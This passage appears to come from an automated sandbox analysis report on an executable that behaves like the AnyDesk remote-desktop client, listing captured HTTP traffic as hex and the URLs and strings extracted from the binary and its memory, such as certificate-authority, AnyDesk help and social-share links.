65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: ad.share.fbook.href=https://www.facebook.com/sharer/sharer.php?u=https%3A//anydesk.com/ equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: ad.share.linkedin.href=https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Remote%20Desktop&summary=AnyDesk%20is%20a%20small%20and%20quick%20solution%20for%20screen%20sharing%20and%20remote%20collaboration.%20Get%20it%20here%3A%20https%3A//anydesk.com/&source= equals www.linkedin.com (Linkedin)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/sharer/sharer.php?u=https%3A//anydesk.com/ equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/sharer/sharer.php?u=https%3A//anydesk.com/b equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.comd5 equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.759165577.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.commm equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.linkedin.comfu equals www.linkedin.com (Linkedin)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.759165577.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.linkedin.comyeE equals www.linkedin.com (Linkedin)
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: svchost.exe, 0000000A.00000002.715359302.0000018397E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                                Source: sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                                Source: sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://support.anydesk.com
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.anydesk.com/
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.opengl.org/registry/
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/)
                                Source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                                Source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalue
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/company#imprint
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/order
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/order2
                                Source: sj9q8uwmax.exe , 00000001.00000003.458587076.000000000359C000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458652270.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458843771.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458065682.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/pa/
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/privacy
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/terms
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/terms~l
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/update
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/updater~
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://boot-01.net.anydesk.com
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalid
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console-ui.myanydesk2.on.anydesk.com
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/6k
                                Source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/HelpLinkInstallLocationAnyDesk
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/access
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/backup-alias
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/backup-aliasn
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/en
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/en/android-battery
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/error-messages
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/macos-security
                                Source: sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/macos-securitys.
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/nnl
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/share
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/shareW
                                Source: sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/shareh
